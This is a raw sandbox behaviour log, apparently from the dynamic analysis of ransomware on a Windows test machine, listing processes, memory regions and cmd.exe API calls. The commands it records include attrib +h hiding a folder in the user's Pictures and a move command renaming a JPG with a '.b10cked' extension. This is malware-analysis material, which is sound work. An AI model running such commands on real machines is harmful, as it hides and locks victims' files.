"\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 17011 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 249 os_tid = 0x808 Process: id = "193" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16a80" os_pid = "0x974" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "187" os_parent_pid = "0xfdc" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 17012 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 17013 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 17014 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 17015 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 17016 start_va = 0x500000 end_va = 0x506fff entry_point = 0x500000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 17017 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17018 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 17019 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 17020 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 17021 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 17022 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 17023 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 17024 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 17025 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 17026 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 17027 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 17028 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 17029 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 17030 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 17031 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 17032 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 17033 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 17034 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 17035 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 17036 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 17037 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 17038 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 17039 start_va = 0x110000 end_va = 0x1d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 17040 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 17041 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 250 os_tid = 0x838 Process: id = "194" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ee0" os_pid = "0x828" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\QGVEFX~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\qgVefxhoS8T3s19q574.jpg.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 17160 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 17161 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 17162 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 17163 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 17164 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 17165 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17166 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 17167 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 17168 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 17169 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 17220 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 17221 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 17222 start_va = 0x160000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 17223 start_va = 0x260000 end_va = 0x2c6fff entry_point = 0x260000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 17224 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 17225 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 17226 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 17227 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 17228 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 17229 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 17230 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 17231 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 17232 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 17233 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 17234 start_va = 0x3a0000 end_va = 0x467fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 17235 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 17236 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 17237 start_va = 0x150000 end_va = 0x156fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 17238 start_va = 0x2d0000 end_va = 0x2d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 17239 start_va = 0x2e0000 end_va = 0x2e0fff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 17240 start_va = 0x2f0000 end_va = 0x2f0fff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 17241 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 17242 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 17243 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Thread: id = 251 os_tid = 0x7ec [0144.807] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fb0c | out: lpSystemTimeAsFileTime=0x12fb0c*(dwLowDateTime=0x903dd100, dwHighDateTime=0x1d440a9)) [0144.807] GetCurrentProcessId () returned 0x828 [0144.807] GetCurrentThreadId () returned 0x7ec [0144.807] GetTickCount () returned 0x2d28a [0144.807] QueryPerformanceCounter (in: lpPerformanceCount=0x12fb04 | out: lpPerformanceCount=0x12fb04*=20159586049) returned 1 [0144.807] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0144.807] __set_app_type (_Type=0x1) [0144.807] __p__fmode () returned 0x76b331f4 [0144.807] __p__commode () returned 0x76b331fc [0144.808] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0144.808] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0144.808] GetCurrentThreadId () returned 0x7ec [0144.808] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7ec) returned 0x38 [0144.808] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0144.808] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0144.808] SetThreadUILanguage (LangId=0x0) returned 0x409 [0144.808] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0144.808] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fa9c | out: phkResult=0x12fa9c*=0x0) returned 0x2 [0144.808] VirtualQuery (in: lpAddress=0x12fad3, lpBuffer=0x12fa6c, dwLength=0x1c | out: lpBuffer=0x12fa6c*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.809] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12fa6c, dwLength=0x1c | out: lpBuffer=0x12fa6c*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0144.809] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12fa6c, dwLength=0x1c | out: lpBuffer=0x12fa6c*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0144.809] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12fa6c, dwLength=0x1c | out: lpBuffer=0x12fa6c*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.809] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12fa6c, dwLength=0x1c | out: lpBuffer=0x12fa6c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0144.809] GetConsoleOutputCP () returned 0x1b5 [0144.809] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0144.809] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0144.809] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.809] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0144.809] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.809] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0144.809] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.809] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0144.809] _get_osfhandle (_FileHandle=0) returned 0x3 [0144.810] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0144.810] _get_osfhandle (_FileHandle=0) returned 0x3 [0144.810] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0144.810] GetEnvironmentStringsW () returned 0x170208* [0144.810] FreeEnvironmentStringsW (penv=0x170208) returned 1 [0144.810] GetEnvironmentStringsW () returned 0x170208* [0144.810] FreeEnvironmentStringsW (penv=0x170208) returned 1 [0144.810] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12ea0c | out: phkResult=0x12ea0c*=0x40) returned 0x0 [0144.810] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x0, lpData=0x12ea18*=0x98, lpcbData=0x12ea10*=0x1000) returned 0x2 [0144.810] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x4, lpData=0x12ea18*=0x1, lpcbData=0x12ea10*=0x4) returned 0x0 [0144.810] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x0, lpData=0x12ea18*=0x1, lpcbData=0x12ea10*=0x1000) returned 0x2 [0144.810] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x4, lpData=0x12ea18*=0x0, lpcbData=0x12ea10*=0x4) returned 0x0 [0144.810] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x4, lpData=0x12ea18*=0x40, lpcbData=0x12ea10*=0x4) returned 0x0 [0144.810] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x4, lpData=0x12ea18*=0x40, lpcbData=0x12ea10*=0x4) returned 0x0 [0144.810] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x0, lpData=0x12ea18*=0x40, lpcbData=0x12ea10*=0x1000) returned 0x2 [0144.811] RegCloseKey (hKey=0x40) returned 0x0 [0144.811] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12ea0c | out: phkResult=0x12ea0c*=0x40) returned 0x0 [0144.811] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x0, lpData=0x12ea18*=0x40, lpcbData=0x12ea10*=0x1000) returned 0x2 [0144.811] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x4, lpData=0x12ea18*=0x1, lpcbData=0x12ea10*=0x4) returned 0x0 [0144.811] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x0, lpData=0x12ea18*=0x1, lpcbData=0x12ea10*=0x1000) returned 0x2 [0144.811] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x4, lpData=0x12ea18*=0x0, lpcbData=0x12ea10*=0x4) returned 0x0 [0144.811] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x4, lpData=0x12ea18*=0x9, lpcbData=0x12ea10*=0x4) returned 0x0 [0144.811] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x4, lpData=0x12ea18*=0x9, lpcbData=0x12ea10*=0x4) returned 0x0 [0144.811] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x0, lpData=0x12ea18*=0x9, lpcbData=0x12ea10*=0x1000) returned 0x2 [0144.811] RegCloseKey (hKey=0x40) returned 0x0 [0144.811] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886373 [0144.811] srand (_Seed=0x5b886373) [0144.811] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\QGVEFX~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\qgVefxhoS8T3s19q574.jpg.b10cked\"" [0144.811] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\QGVEFX~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\qgVefxhoS8T3s19q574.jpg.b10cked\"" [0144.811] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0144.811] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x171968, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0144.811] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0144.812] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0144.812] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0144.812] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0144.812] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0144.812] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0144.812] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0144.812] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0144.812] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0144.812] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0144.812] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0144.812] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0144.812] GetEnvironmentStringsW () returned 0x172358* [0144.812] FreeEnvironmentStringsW (penv=0x172358) returned 1 [0144.812] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0144.812] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0144.812] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0144.812] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0144.812] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0144.812] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0144.812] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0144.812] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0144.812] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0144.812] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0144.812] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f7d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0144.812] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f7d8, lpFilePart=0x12f7d4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f7d4*="Desktop") returned 0x18 [0144.812] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0144.813] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f554 | out: lpFindFileData=0x12f554) returned 0x1709e8 [0144.813] FindClose (in: hFindFile=0x1709e8 | out: hFindFile=0x1709e8) returned 1 [0144.813] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f554 | out: lpFindFileData=0x12f554) returned 0x1709e8 [0144.813] FindClose (in: hFindFile=0x1709e8 | out: hFindFile=0x1709e8) returned 1 [0144.813] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f554 | out: lpFindFileData=0x12f554) returned 0x1709e8 [0144.813] FindClose (in: hFindFile=0x1709e8 | out: hFindFile=0x1709e8) returned 1 [0144.813] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0144.813] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0144.813] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0144.813] GetEnvironmentStringsW () returned 0x170208* [0144.813] FreeEnvironmentStringsW (penv=0x170208) returned 1 [0144.813] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0144.814] GetConsoleOutputCP () returned 0x1b5 [0144.814] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0144.814] GetUserDefaultLCID () returned 0x409 [0144.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, 